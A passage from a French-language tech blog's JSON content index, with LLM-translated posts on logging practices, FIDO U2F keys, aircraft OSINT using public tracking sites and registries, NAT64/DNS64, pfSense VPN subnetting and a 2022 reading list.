(par exemple les données de santé, les numéros de carte de crédit, les numéros de pièces d\u0026rsquo;identité officielles), les données d\u0026rsquo;une classification de sécurité supérieure à ce que le système de journalisation est autorisé à stocker, \u0026hellip; Ce que vous pouvez (ou devriez) journaliser dépend aussi des réglementations et standards auxquels vous êtes soumis (par exemple le RGPD, PCI DSS, HIPAA).\nBien que vous deviez éviter de journaliser trop de données d\u0026rsquo;événements (par exemple le contenu complet des requêtes HTTP), vous devez quand même journaliser tous les événements pertinents pour votre système. Par exemple (mais sans s\u0026rsquo;y limiter) :\nÉchec de validation des données Authentification des utilisateurs (échec et succès) Échecs d\u0026rsquo;autorisation Changement d\u0026rsquo;état du système (démarrage, arrêt de l\u0026rsquo;application, \u0026hellip;) Accès aux données sensibles et modification de données Utilisation d\u0026rsquo;accès privilégiés (ajout de nouveaux utilisateurs, changement de mots de passe, \u0026hellip;) Erreurs et défaillances de l\u0026rsquo;application et du système Export de données Lorsque vous journalisez de telles choses, vous voulez répondre aux questions \u0026ldquo;Qui ? Quand ? Où ? Quoi ?\u0026rdquo;. Vous pourriez aussi vouloir inclure des informations supplémentaires selon ce que vous journalisez (par exemple, une exception Java si un programme échoue).\nUn exemple de logs pour notre situation précédente pourrait être [IP] [Date] Authentification échouée pour l'utilisateur [username] : mauvais mot de passe\nEn résumé, vous voulez vous demander : \u0026ldquo;Si un incident se produit, mes logs sont-ils suffisants pour me permettre de trouver la cause et comprendre ce qui s\u0026rsquo;est passé juste en les consultant ?\u0026rdquo;\nConclusion # La journalisation est un vaste sujet, et un article de blog ne suffirait pas pour dire tout ce qu\u0026rsquo;il y a à dire, mais si vous voulez en savoir plus sur la journalisation, l\u0026rsquo;OWASP a une très bonne et détaillée fiche pratique. Le livre Practical Monitoring que j\u0026rsquo;ai mentionné ici est aussi une excellente ressource.\nQuelques points qui méritent d\u0026rsquo;être mentionnés également lorsqu\u0026rsquo;on parle de journalisation sont le coût financier de la journalisation excessive de données et le risque de journaliser des données non assainies (log4j).\nCrédits # Photo de couverture par Jake Walker sur Unsplash ","date":"2023-03-08","externalUrl":null,"permalink":"/fr/posts/2023/my-first-cve-2023-22481-danger-over-logging/","section":"Articles","summary":"Dans cet article, nous plongerons dans les risques liés à la journalisation excessive de données par les logiciels, et explorerons les bonnes pratiques de journalisation.","title":"Mon premier CVE, et les dangers de la journalisation excessive","type":"posts"},{"content":"Avertissement : Cet article a été traduit de l\u0026rsquo;anglais par un LLM. La précision n\u0026rsquo;est pas garantie. Vous pouvez lire l\u0026rsquo;article original en anglais.\nJ\u0026rsquo;utilise des Yubikeys pour la 2FA depuis un bon moment, mais je n\u0026rsquo;avais jamais pris le temps de regarder comment elles fonctionnent au niveau du protocole. C\u0026rsquo;est ce que nous allons aborder dans cet article.\nSi vous n\u0026rsquo;êtes pas familier avec FIDO U2F, il s\u0026rsquo;agit d\u0026rsquo;un standard d\u0026rsquo;authentification qui permet aux clés de sécurité physiques « d\u0026rsquo;agir comme un second facteur pour renforcer les flux de connexion existants basés sur nom d\u0026rsquo;utilisateur/mot de passe ». En termes simples, cela nécessite d\u0026rsquo;avoir une clé de sécurité branchée sur votre ordinateur, et optionnellement de la toucher pour autoriser une connexion après avoir entré votre mot de passe (des versions NFC existent également).\nNotez que par souci de brièveté et de clarté, j\u0026rsquo;ai simplifié certaines choses (par exemple, je n\u0026rsquo;explique pas le rôle du navigateur dans les différentes interactions). Si vous souhaitez en savoir plus sur les détails, Yubico dispose d\u0026rsquo;une page de documentation très complète.\nEnregistrement de l\u0026rsquo;appareil # La première étape pour pouvoir utiliser votre clé comme 2FA avec un site web est de l\u0026rsquo;enregistrer. La figure suivante montre comment cela se fait.\nEnregistrement d\u0026rsquo;une clé de sécurité U2F En résumé, le token U2F génère une paire de clés (ECC). Il utilise ensuite sa clé maîtresse — qui ne quitte jamais l\u0026rsquo;appareil — pour chiffrer la clé privée + l\u0026rsquo;App ID, et les envoie avec la clé publique au site web.\nBien qu\u0026rsquo;envoyer une clé privée (même chiffrée) puisse sembler un peu étrange, cela permet à la clé de sécurité de ne pas dépendre du stockage local, et elle peut donc être utilisée pour un nombre illimité de sites web.\nLe schéma montre simplement l\u0026rsquo;App ID par simplification, mais vous devez comprendre cet App ID comme quelque chose comme l\u0026rsquo;URL du site web/la source des requêtes vers la clé U2F.\nAuthentification # Maintenant que notre clé est configurée, nous pouvons l\u0026rsquo;utiliser comme dispositif d\u0026rsquo;authentification 2FA lors de la connexion au site web. Ce qui se passe alors est illustré dans la figure suivante.\nAuthentification par clé U2F En résumé, le flux est le suivant lorsque la clé de sécurité est utilisée :\nLa clé U2F prend le key handle (généré lors de la phase d\u0026rsquo;enregistrement) et le déchiffre avec sa clé maîtresse pour obtenir la clé privée et l\u0026rsquo;app ID. Ce processus permet également de vérifier que ce site web a bien été enregistré La clé U2F possède un compteur local qui est incrémenté à chaque authentification avec un site web. Cela permet de prévenir les attaques par rejeu : le site web stockera le compteur actuel à chaque authentification et rejettera toute réponse avec un compteur inférieur Lors de l\u0026rsquo;authentification, le client vérifiera également que l\u0026rsquo;App ID correspond à l\u0026rsquo;adresse du site web auquel il est actuellement connecté. Ceci est fait pour éviter le phishing : si un tiers essaie d\u0026rsquo;intercepter les messages, l\u0026rsquo;origine de la requête d\u0026rsquo;authentification sera différente, et donc l\u0026rsquo;authentification n\u0026rsquo;aboutira pas Comme vous vous en souvenez de la partie précédente, le site web stocke la clé publique ECC générée par le token U2F lors de la phase d\u0026rsquo;enregistrement. La clé U2F utilisera la clé privée ECC récupérée du handle pour signer les données de challenge (aléatoires) et quelques autres champs, et le site web pourra valider grâce à la clé publique que les données ont bien été signées par le bon appareil Conclusion # Vous devriez maintenant avoir une bonne compréhension du fonctionnement des clés de sécurité U2F. Notez que l\u0026rsquo;implémentation de telles clés peut différer d\u0026rsquo;un fabricant à l\u0026rsquo;autre. Par exemple :\nIl pourrait y avoir un compteur pour chaque service avec lequel la clé s\u0026rsquo;authentifie plutôt qu\u0026rsquo;un compteur global Le handle ne doit pas nécessairement contenir la clé privée ECC. Le token pourrait très bien envoyer un identifiant unique au service, et stocker localement quelle clé privée ECC est associée à quel service Sources # How FIDO U2F Works (Yubico) Key Generation (Yubico) U2F Specs (FIDO Alliance) Crédits # Photo de couverture par regularguy.eth sur Unsplash ","date":"2023-01-17","externalUrl":null,"permalink":"/fr/posts/2023/today-i-learned-how-fido-u2f-security-keys-work/","section":"Articles","summary":"Cet article explique comment fonctionnent les Yubikeys et autres clés de sécurité FIDO U2F, et comment elles permettent de faire de la 2FA en les touchant","title":"TIL : Comment fonctionnent les clés de sécurité FIDO U2F","type":"posts"},{"content":"Avertissement : Cet article a été traduit de l\u0026rsquo;anglais par un LLM. La précision n\u0026rsquo;est pas garantie. Vous pouvez lire l\u0026rsquo;article original en anglais.\nDans cet article, nous explorerons plusieurs façons de faire de l\u0026rsquo;OSINT lié aux aéronefs. D\u0026rsquo;abord, je présenterai quelques concepts de base tels que les numéros d\u0026rsquo;identification disponibles et les moyens de localiser les aéronefs en vol. Ensuite, nous examinerons divers outils permettant de suivre et d\u0026rsquo;identifier les aéronefs ainsi que de trouver qui en est le propriétaire.\nConcepts de base # Numéros d\u0026rsquo;identification # Il existe trois numéros qui peuvent être utilisés pour suivre un aéronef : le numéro d\u0026rsquo;immatriculation, le numéro de série et l\u0026rsquo;indicatif d\u0026rsquo;appel. Voyons quelles sont leurs spécificités.\nNuméro d\u0026rsquo;immatriculation # Les aéronefs doivent être immatriculés dans un pays qui leur attribuera un numéro d\u0026rsquo;immatriculation unique. Le numéro commence par le préfixe du pays et doit être affiché sur l\u0026rsquo;aéronef. Par exemple, l\u0026rsquo;avion sur la photo ci-dessous est immatriculé \u0026ldquo;9H-NEO\u0026rdquo; (9H est le code pays de Malte).\nAirplane registered as 9H-NEO Un aéronef ne peut être immatriculé que dans un seul pays, mais son immatriculation peut changer au cours de sa durée de vie. Aussi, certains pays autorisent la réutilisation des numéros d\u0026rsquo;immatriculation si un aéronef a été vendu, détruit ou mis à la retraite.\nNuméro de série # Le numéro de série est attribué par le constructeur, ce qui signifie que, contrairement au numéro d\u0026rsquo;immatriculation, le numéro de série restera le même pendant toute la durée de vie d\u0026rsquo;un aéronef.\nIndicatif d\u0026rsquo;appel # L\u0026rsquo;indicatif d\u0026rsquo;appel est un identifiant unique utilisé par les aéronefs pendant leurs vols. La plupart du temps, les avions privés utiliseraient leur numéro d\u0026rsquo;immatriculation, et les avions commerciaux un numéro dépendant de leur route.\nSuivi de position # Plusieurs méthodes permettent aux sites de radar de vol de suivre les avions :\nMLAT (Multilatération) utilise quatre récepteurs ou plus pour recevoir les signaux des aéronefs. En mesurant la différence de temps d\u0026rsquo;arrivée (TDOA) des signaux radio, nous sommes alors capables de déterminer la position et la vitesse de l\u0026rsquo;aéronef (en gros, de la triangulation) ADS-B (Automatic Dependent Surveillance-Broadcast) est une technologie utilisée par les aéronefs pour diffuser périodiquement (par radio) leur identification, leur position (obtenue par GPS), leur altitude et leur vitesse ADS-C (Automatic Dependent Surveillance - Contract) est similaire à l\u0026rsquo;ADS-B, mais l\u0026rsquo;aéronef enverra les informations de vol à des parties contractantes par satellite plutôt que de les diffuser avec son émetteur radio Quelques ressources sont listées à la fin de cet article si vous souhaitez en savoir plus sur ces systèmes. Notez qu\u0026rsquo;il existe d\u0026rsquo;autres mécanismes de suivi des aéronefs (comme le radar), mais je ne les ai pas mentionnés car ils ne sont pas pertinents pour cet article.\nMessages NOTAM # Les messages \u0026ldquo;Notice to Air Men\u0026rdquo; sont créés et transmis par les opérateurs d\u0026rsquo;aéroport et les agences gouvernementales pour alerter les pilotes de dangers potentiels sur leur route de vol ou à un emplacement.\nExample of NOTAM message Ressources OSINT # Cartes du trafic aérien en temps réel # Les plateformes suivantes affichent des cartes avec le trafic aérien actuel. Toutes vous permettent de :\nVoir tous les aéronefs en vol à un endroit particulier En sélectionner un, et voir sa route, son type, son numéro d\u0026rsquo;immatriculation, sa vitesse, sa photo, \u0026hellip; Chaque site web a des fonctionnalités légèrement différentes qui peuvent être plus ou moins pratiques selon ce que vous recherchez. Il est aussi possible qu\u0026rsquo;un service n\u0026rsquo;ait pas les données que vous cherchez alors qu\u0026rsquo;un autre les a.\nExample of an Aircraft tracking website (absbexchange.com) absbexchange.com J\u0026rsquo;aime beaucoup celui-ci. L\u0026rsquo;interface n\u0026rsquo;est pas aussi lourde que certains de ses concurrents, et il vous permet de filtrer l\u0026rsquo;espace aérien pour n\u0026rsquo;afficher que les aéronefs militaires (je n\u0026rsquo;ai encore jamais vu de jet de combat - je suppose que la plupart des avions militaires n\u0026rsquo;activent pas leurs transpondeurs ou utilisent d\u0026rsquo;autres techniques d\u0026rsquo;évasion)\nradarbox.com Ce site web a beaucoup de fonctionnalités (dont beaucoup nécessiteront un abonnement). En plus de la carte des vols en direct, vous pouvez voir quelles zones sont couvertes, l\u0026rsquo;historique des vols, des statistiques, les vols ayant eu une urgence, et il y a beaucoup de filtres que vous pouvez utiliser.\nflightradar24.com Une version plus légère de Radarbox. Il a aussi une belle vue des arrivées et départs des aéroports.\nflightaware.com Sur ce site, vous pouvez voir l\u0026rsquo;historique des vols à partir d\u0026rsquo;un numéro d\u0026rsquo;immatriculation, et même acheter l\u0026rsquo;historique complet des vols si vous le souhaitez. Il fournit également un bel\nEspace aérien # iFlightPlanner La fonctionnalité la plus intéressante de ce site web est qu\u0026rsquo;il permet d\u0026rsquo;afficher les zones spéciales (interdites, restreintes, d\u0026rsquo;avertissement, \u0026hellip;). Il permet aussi d\u0026rsquo;afficher les conditions météorologiques et quelles zones sont utilisables par quelle catégorie d\u0026rsquo;aéronef. Malheureusement, il ne fonctionne que pour le territoire américain.\niFlightPlanner screen - showing a restricted area due to a VIP Presence FreeRadar.uk Ce site web affiche une carte avec le trafic, mais ce n\u0026rsquo;est pas sa meilleure fonctionnalité. Ce qu\u0026rsquo;il fait bien, c\u0026rsquo;est afficher les différents espaces aériens (contrôlés, restreints, dangereux, \u0026hellip;) et les aérodromes (militaires et civils). Il ne fonctionne que pour le territoire britannique.\nRadio et autres communications # LiveATC.net Ce site web vous permet d\u0026rsquo;écouter en direct les conversations radio du trafic aérien autour des aéroports. Les flux sont fournis par des bénévoles équipés de récepteurs radio.\nOurAirports.com Ce site web a beaucoup d\u0026rsquo;informations utiles telles que la météo à un aéroport spécifique ainsi que les vols entrants et sortants, mais les éléments les plus utiles sont les messages NOTAM et les fréquences radio.\nAirportWebcams.net Ce site web fournit une collection de webcams d\u0026rsquo;aéroport en temps réel consultables par aéroport.\nPropriété des avions # Identification visuelle # Il y a deux types d\u0026rsquo;informations d\u0026rsquo;identification utiles que vous pouvez obtenir d\u0026rsquo;une photo d\u0026rsquo;avion. Le premier est le numéro d\u0026rsquo;immatriculation, comme nous en avons discuté précédemment. Le second est le design de l\u0026rsquo;avion et les logos peints dessus. Il existe plusieurs sites web sur Internet permettant de rechercher des logos.\nairlinelogos.net Ce site web est une galerie d\u0026rsquo;images et vous pouvez rechercher des compagnies aériennes par pays et autres critères.\nairhex.com Celui-ci a une interface un peu plus moderne et vous permet de télécharger leur base de données de logos (avec filigranes) et de données de compagnies aériennes gratuitement. Il propose également une API (payante).\nairhex.com logo page Si vous souhaitez en savoir plus sur l\u0026rsquo;OSINT lié aux images, cet article que j\u0026rsquo;ai écrit précédemment pourrait vous intéresser.\nÀ qui appartient-il # Selon le pays, le registre de propriété peut être public et accessible sur Internet.\nSi vous avez un numéro d\u0026rsquo;immatriculation ou de série, vous pouvez essayer AeroTransport, planelogger, et rzjets pour obtenir des informations d\u0026rsquo;immatriculation.\nRegistration details of the registration for the number N628TS Alternativement, vous pouvez consulter cette liste pour essayer de voir dans quel pays le numéro a été immatriculé. De là, il vous suffit de rechercher le registre dudit pays.\nPar exemple, voici les registres pour certains pays :\nThe Federal Aviation Administration (USA) Flightaware vous permet aussi de voir facilement l\u0026rsquo;historique de propriété pour un numéro d\u0026rsquo;immatriculation Civil Aviation Authority (Royaume-Uni) Directorate General for Civil Aviation (France) Federal Office of Civil Aviation (Suisse) Transport Canada Civil Aviation Directorate (Canada) - immatriculation actuelle, immatriculation historique Civil Aviation Safety Authority (Australie) Si vous voulez savoir quelle est l\u0026rsquo;autorité en charge de l\u0026rsquo;aviation civile pour un pays, vous pouvez consulter cette page.\nConclusion # Dans cet article, nous avons parcouru les principales techniques que vous pouvez utiliser pour faire de l\u0026rsquo;OSINT lié aux aéronefs, et les informations que vous pouvez obtenir. Bien qu\u0026rsquo;il ne soit pas possible de créer une liste de toutes les ressources disponibles dans un seul article de blog (par exemple chaque site de streaming radio du trafic aérien), les ressources mentionnées précédemment devraient vous aider dans vos projets d\u0026rsquo;OSINT.\nSources # How We Track Flights with MLAT (flightradar24) Aircraft Transponders: What They Are and How They Work (Aviation Matters) ADS-B and ADS-C: The 3 Key Differences (Aviation Matters) En-route Tracking of Aircraft (Skybrary) Automatic Dependent Surveillance-Broadcast (Wikipedia) OCEANIC FLIGHT TRACKING (Air Services Australia) Aircraft registration (Wikipedia) What is Aircraft Registration? (Interconnect Wiring) Aircraft Call-sign (Skybrary) NOTAM (Wikipedia) Crédits # Photo de couverture par Ashim D\u0026rsquo;Silva sur Unsplash Photo de l\u0026rsquo;avion 9H-NEO par Isaac Struna ","date":"2023-01-14","externalUrl":null,"permalink":"/fr/posts/2023/airplanes-related-osint-simple-introduction-guide/","section":"Articles","summary":"Dans cet article, nous explorons les différentes façons dont l’OSINT peut être utilisé pour suivre les avions, y compris leur position, leur propriétaire et leurs plans de vol","title":"OSINT lié aux aéronefs : un guide simple","type":"posts"},{"content":"Avertissement : Cet article a été traduit de l\u0026rsquo;anglais par un LLM. La précision n\u0026rsquo;est pas garantie. Vous pouvez lire l\u0026rsquo;article original en anglais.\nAujourd\u0026rsquo;hui, j\u0026rsquo;ai appris l\u0026rsquo;existence de NAT64 et DNS64 : des mécanismes utilisés pour permettre aux réseaux IPv6 uniquement d\u0026rsquo;interagir avec des réseaux IPv4 uniquement. Ces mécanismes attribuent (localement) une adresse IP avec le préfixe bien connu 64:ff9b::/96 à tout service IPv4 uniquement auquel vous essayez d\u0026rsquo;accéder.\nRécemment, en utilisant mon téléphone pour accéder à un service (nécessitant un accès via VPN) sur mon serveur personnel, j\u0026rsquo;ai obtenu une erreur \u0026ldquo;403 Forbidden\u0026rdquo;. \u0026ldquo;C\u0026rsquo;est bizarre,\u0026rdquo; me suis-je dit. \u0026ldquo;Je suis connecté via WireGuard, donc je devrais pouvoir y accéder\u0026hellip;\u0026rdquo; En y regardant de plus près, j\u0026rsquo;ai remarqué quelque chose d\u0026rsquo;inattendu : le client WireGuard (configuré pour atteindre une adresse IPv4) était connecté à un endpoint IPv6 avec une adresse ressemblant à 64:ff9b::xxxx:xxxx. Après quelques investigations, j\u0026rsquo;ai découvert que d\u0026rsquo;une manière ou d\u0026rsquo;une autre, le réseau attribuait une IPv6 à mon serveur et forçait tout le trafic à passer par celle-ci.\nAprès quelques recherches, j\u0026rsquo;ai découvert que mon nouvel opérateur mobile utilisait un réseau IPv6 uniquement, et utilisait NAT64 et DNS64 pour se connecter aux réseaux et services IPv4 uniquement. En résumé, voici ce qui se passait :\nMon téléphone envoyait une requête DNS au réseau pour accéder à mysite.com Le DNS de mon opérateur essayait de résoudre l\u0026rsquo;entrée DNS AAAA inexistante pour mysite.com. N\u0026rsquo;arrivant pas à la résoudre, il créait une IPv6 dans 64:ff9b::/96 (basée sur l\u0026rsquo;enregistrement DNS A, en utilisant la RFC 5062) et la renvoyait à mon téléphone En essayant de se connecter à mysite.com, mon téléphone utilisait l\u0026rsquo;IPv6 attribuée. Le système de routage de mon opérateur utilisait ensuite NAT64 pour atteindre mon serveur en IPv4 Comme la liste des Allowed IPs de mon Wireguard ne contenait que l\u0026rsquo;IPv4 et le CIDR VPN de mon serveur, le trafic n\u0026rsquo;était pas routé à travers celui-ci, et donc refusé par mon serveur Le schéma suivant donne une bonne représentation de toutes les interactions entre les différents composants.\nNAT64 et DNS64 (source : Wikipedia) Heureusement, la correction était assez simple : modifier mon enregistrement DNS avec de nouvelles entrées AAAA et ajouter l\u0026rsquo;IPv6 de mon serveur à la configuration des Allowed IPs de WireGuard a permis de tout router correctement.\nSources et lectures complémentaires # DNS64: DNS Extensions for Network Address Translation from IPv6 Clients to IPv4 Servers (RFC 6147, IETF) IPv6 Addressing of IPv4/IPv6 Translators (RFC 5062, IETF) NAT64 and DNS64 (Wikipedia) NAT64/DNS64 (JPNIC - en japonais) Crédits # Photo de couverture par Lars Kienle sur Unsplash ","date":"2023-01-08","externalUrl":null,"permalink":"/fr/posts/2023/today-i-learned-nat64-and-dns64/","section":"Articles","summary":"TIL : NAT64 et DNS64 peuvent être utilisés par un réseau IPv6 uniquement pour communiquer avec un réseau IPv4 uniquement. Les adresses IPv4 sont converties dans le CIDR 64:ff9b::/96","title":"TIL : NAT64 et DNS64","type":"posts"},{"content":"Avertissement : Cet article a été traduit de l\u0026rsquo;anglais par un LLM. La précision n\u0026rsquo;est pas garantie. Vous pouvez lire l\u0026rsquo;article original en anglais.\nIl y a quelques mois, j\u0026rsquo;ai publié un article expliquant comment configurer pfSense sur votre réseau domestique pour améliorer sa confidentialité et sa sécurité. Au fil du temps, j\u0026rsquo;ai trouvé des moyens d\u0026rsquo;améliorer cette configuration pour rendre mon réseau plus fiable et réduire la charge de configuration lors de l\u0026rsquo;ajout de nouvelles machines. C\u0026rsquo;est ce que je vais présenter dans cet article.\nPare-feu plus simple et basculement entre réseau VPN/non-VPN # Dans ma configuration initiale, j\u0026rsquo;attribuais les clients au sous-réseau 192.168.1.0/24, je routais tout le trafic Internet à travers ma connexion VPN par défaut, et j\u0026rsquo;ajoutais des règles de pare-feu pour chaque machine que je voulais utiliser sans le VPN.\nCette configuration avait plusieurs problèmes. Premièrement, configurer une nouvelle machine pour ne pas utiliser le VPN nécessitait des modifications de configuration à au moins trois endroits. Ensuite, il n\u0026rsquo;y avait pas de moyen simple de désactiver temporairement le VPN pour une machine.\nDans ma nouvelle configuration, j\u0026rsquo;utilise le sous-réseau 192.168.0.0/22 et j\u0026rsquo;attribue les IP comme suit :\n192.168.0.2 -\u0026gt; 192.168.0.254 sont attribuées par DHCP et utilisent le VPN + pfBlockerNG 192.168.1.2 -\u0026gt; 192.168.1.254 sont attribuées manuellement et utilisent le VPN + pfBlockerNG 192.168.2.2 -\u0026gt; 192.168.2.254 sont attribuées manuellement et n\u0026rsquo;utilisent pas le VPN mais utilisent pfBlockerNG 192.168.3.2 -\u0026gt; 192.168.3.254 sont attribuées manuellement et n\u0026rsquo;utilisent ni le VPN ni pfBlockerNG (mais utilisent toujours le DNS local) Lorsque j\u0026rsquo;ajoute une nouvelle machine à mon réseau, je fais en sorte que le dernier octet de son adresse IP soit unique pour que le basculement entre sous-réseaux soit plus pratique (moins de risque de basculer vers une IP déjà utilisée). Par exemple, si j\u0026rsquo;ai trois machines, je leur attribuerai les IP 192.168.1.2, 192.168.3.3 et 192.168.1.4. Si à un moment donné je veux utiliser la première machine sans VPN, je peux simplement changer sa configuration WiFi pour utiliser l\u0026rsquo;IP 192.168.2.2 dans les paramètres réseau, et je sais que cette IP ne sera pas utilisée par une autre machine.\nMaintenant, configurons tout cela. La première étape est d\u0026rsquo;aller dans l\u0026rsquo;interface LAN et de modifier sa configuration IP statique.\nInterfaces -\u0026gt; LAN -\u0026gt; Configuration IPv4 Ensuite, nous nous assurons que notre serveur DHCP est correctement configuré dans Services/DHCP Server/LAN\nServices -\u0026gt; DHCP Server -\u0026gt; LAN -\u0026gt; Options générales Ensuite les règles de NAT sortant et de pare-feu LAN\nFirewall -\u0026gt; NAT -\u0026gt; Outbound Firewall -\u0026gt; Rules -\u0026gt; LAN Enfin, nous voulons désactiver pfBlockerNG pour 192.168.3/24. Allons dans Firewall/pfBlockerNG/DNSBL/Python Group Policy et inscrivons chaque adresse dans les Bypass IPs. Malheureusement, il n\u0026rsquo;y a apparemment pas moyen de donner une plage, mais nous pouvons obtenir toutes les adresses qu\u0026rsquo;elle contient avec le script bash suivant (que nous exécutons sur notre machine avant de coller le résultat dans l\u0026rsquo;interface).\nfor value in {0..254} do echo \u0026#34;192.168.3.$value\u0026#34; done Maintenant que tout est configuré, nous n\u0026rsquo;avons plus à faire de modifications compliquées chaque fois que nous ajoutons une machine à notre réseau. Nous pouvons simplement aller dans les DHCP Static Mappings de l\u0026rsquo;interface LAN et attribuer une IP dans la plage appropriée à notre nouvelle machine.\nDans mon cas, comme mon routeur WiFi peut utiliser à la fois un réseau 2,4 GHz et un réseau 5 GHz en même temps, j\u0026rsquo;ai mon ordinateur qui se connecte automatiquement au premier en utilisant le DHCP (avec une IP attribuée pour utiliser le VPN) et le second a la connexion automatique désactivée avec l\u0026rsquo;adresse IP que je veux configurée manuellement sur mon ordinateur.\nMeilleure fiabilité pour les utilisateurs non intéressés par la vie privée # Si vous avez des personnes chez vous qui ne sont pas intéressées par la vie privée, elles se plaindront probablement (bruyamment) si elles rencontrent des problèmes. Cela pourrait être une erreur de connexion VPN, une IP sur liste noire, ou un faux positif du bloqueur de publicités.\nCe que je fais dans ce cas est d\u0026rsquo;ajouter un mappage DHCP pour leurs machines dans le réseau 192.168.3.0/24 afin qu\u0026rsquo;elles n\u0026rsquo;utilisent ni le VPN ni le bloqueur de publicités. Je configurerai également un deuxième et un troisième serveur DNS dans la configuration DHCP (ici ceux de Cloudflare).\nServices -\u0026gt; DHCP Server -\u0026gt; LAN -\u0026gt; Modifier le mappage statique La raison du mappage VPN est que dans l\u0026rsquo;article précédent, nous avons configuré le résolveur pour qu\u0026rsquo;il utilise la connexion VPN pour faire les requêtes DNS. Cela signifie que si le VPN est en panne, le DNS le sera aussi. L\u0026rsquo;ajout de serveurs DNS supplémentaires permet de s\u0026rsquo;assurer que les machines connectées au réseau ne seront pas affectées par le non-fonctionnement du DNS de pfSense.\nVPN de secours en cas de panne # Avec la configuration précédente, nous avons amélioré la fiabilité du réseau pour les machines n\u0026rsquo;utilisant pas le VPN, mais qu\u0026rsquo;en est-il des autres ? Pour y remédier, nous allons configurer pfSense pour avoir une deuxième connexion VPN vers un autre serveur VPN, et router le trafic concerné à travers celle-ci si la première connexion VPN échoue.\nD\u0026rsquo;abord, nous allons dans VPN/OpenVPN/Clients, créons un nouveau client et vérifions qu\u0026rsquo;il fonctionne correctement dans Status/OpenVPN.\nEnsuite, nous allons dans Interfaces/Interface Assignments et attribuons une nouvelle interface au client VPN que nous venons de créer.\nInterfaces/Interface Assignments Après cela, nous allons dans System/Routing/Gateways et nous assurons d\u0026rsquo;avoir une passerelle avec la configuration suivante, et en créons une nouvelle si elle n\u0026rsquo;existe pas.\nSystem -\u0026gt; Routing -\u0026gt; Gateway (Édition) Ensuite, dans System/Routing/Gateway Groups, nous créons un nouveau groupe de passerelles et attribuons un tier à chaque connexion VPN. Dans mon cas, je veux toujours utiliser VPN1 sauf quand il ne fonctionne pas correctement, auquel cas je veux basculer vers VPN2. Mettre le même tier fonctionne aussi, mais cela signifie que les deux VPN seront utilisés en parallèle.\nÉdition du groupe de passerelles Enfin, nous devons aller dans Firewall/Rules/LAN et Firewall/NAT/Outbound et modifier les règles utilisant VPN1 pour qu\u0026rsquo;elles utilisent VPNs.\nÀ ce stade, tout le réseau fonctionne, mais comme nous utilisons aussi un résolveur DNS local, nous voulons aussi aller dans Services/DNS Resolver et changer les Outgoing Network Interfaces pour avoir à la fois VPN1 et VPN2 sélectionnés (malheureusement, il n\u0026rsquo;est actuellement pas possible d\u0026rsquo;utiliser notre groupe de passerelles VPNs pour le moment).\nConclusion # Si vous avez suivi toutes les étapes de cet article, votre réseau domestique est maintenant plus fiable, et vous ne devriez plus subir d\u0026rsquo;inconvénients lorsque la connexion VPN tombe, ou lorsque vous voulez définir quelle machine doit ou ne doit pas utiliser la connexion VPN.\nSi vous avez trouvé cet article utile, vous apprécierez peut-être aussi mon récent article Comment protéger vos services auto-hébergés avec WireGuard où j\u0026rsquo;explique comment configurer une machine pfSense pour router le trafic vers une plage d\u0026rsquo;IP spécifique à travers une connexion VPN WireGuard.\nCrédits # Image de couverture par Compare Fibre sur Unsplash ","date":"2022-12-26","externalUrl":null,"permalink":"/fr/posts/2022/home-network-and-pfsense-improvements/","section":"Articles","summary":"Dans cet article, nous verrons comment rendre un réseau géré par pfSense plus fiable lors de l’utilisation d’un VPN, et permettre une gestion simple des sous-réseaux","title":"Améliorations du réseau domestique et de la configuration pfSense","type":"posts"},{"content":"Avertissement : Cet article a été traduit de l\u0026rsquo;anglais par un LLM. La précision n\u0026rsquo;est pas garantie. Vous pouvez lire l\u0026rsquo;article original en anglais.\nAlors que 2022 touche à sa fin, j\u0026rsquo;ai pensé partager une liste de certains des livres que j\u0026rsquo;ai appréciés au cours de l\u0026rsquo;année et que je recommande de lire. Je les ai regroupés par catégorie (sans ordre particulier) et, comme il y en a pas mal, j\u0026rsquo;ai juste écrit un court commentaire pour chacun afin d\u0026rsquo;éviter d\u0026rsquo;écrire un article excessivement long.\nJe suis assez satisfait du nombre de livres que j\u0026rsquo;ai réussi à terminer cette année (plus de cinquante). C\u0026rsquo;est en partie grâce à la prise de conscience de la commodité et de l\u0026rsquo;efficacité d\u0026rsquo;Audible pour consommer des livres tout en faisant autre chose (bien que je ne l\u0026rsquo;aie trouvé adapté qu\u0026rsquo;aux livres non techniques).\nInformatique # Building Secure and Reliable Systems: Best Practices for Designing, Implementing, and Maintaining Systems (Heather Adkins, et al.) Un livre perspicace écrit par des ingénieurs de Google sur les stratégies de conception de systèmes, le codage/test/débogage et la gestion des incidents. Container Security: Fundamental Technology Concepts That Protect Containerized Applications (Liz Rice) Un livre bien écrit avec de bons conseils pratiques. Practical Monitoring (Mike Julian) J\u0026rsquo;ai dû travailler sur des sujets liés au monitoring cette année, et j\u0026rsquo;ai trouvé ce livre utile. Social Engineering: The Science of Human Hacking (Christopher Hadnagy) Une lecture divertissante, mais qui ne va pas très en profondeur. Data and Goliath: The Hidden Battles to Collect Your Data and Control Your World (Bruce Schneier) Un livre sur la vie privée, la collecte de données et la surveillance. Toujours pertinent malgré ses sept ans. Learn Wireshark: Confidently navigate the Wireshark interface and solve real-world networking problems (Lisa Bock) Bonne introduction si vous voulez apprendre à utiliser Wireshark. Sinon, vous apprendrez peut-être quelques astuces. Sciences # The Gene: An Intimate History (Siddhartha Mukherjee) \u0026ldquo;Lire The Gene, c\u0026rsquo;est comme suivre un cours avec un professeur brillant et passionné qui est convaincu de pouvoir vous faire comprendre ce dont il parle\u0026hellip; Excellent.\u0026rdquo; - Seattle Times The Art of Statistics: Learning from Data (David Spiegelhalter) \u0026ldquo;Dans cette introduction merveilleusement accessible aux statistiques modernes, David Spiegelhalter a créé un digne successeur de classiques tels que Facts from Figures de Mooney. En utilisant de nombreux exemples réels, il présente les méthodes et les concepts sous-jacents, montrant la puissance et l\u0026rsquo;élégance des statistiques pour la compréhension et la prise de décision.\u0026rdquo; - David J. Hand Brief Answers to the Big Questions (Stephen Hawking) \u0026ldquo;Brief Answers est sans effort instructif, captivant, à jour et - là où ça compte - spirituel.\u0026rdquo; - The Guardian Predictably Irrational: The Hidden Forces That Shape Our Decisions (Dan Ariely) \u0026ldquo;Un livre merveilleux qui est à la fois stimulant et très divertissant, allant du pouvoir des placebos aux plaisirs du Pepsi. Ariely démasque les astuces subtiles mais puissantes que notre esprit nous joue, et nous montre comment éviter d\u0026rsquo;être dupés.\u0026rdquo; - Jerome Groopman Thinking, Fast and Slow **** (Daniel Kahneman) Il m\u0026rsquo;a fallu longtemps pour le lire. Le postulat du livre est intéressant, et les exemples qu\u0026rsquo;il donne sont éclairants, mais je 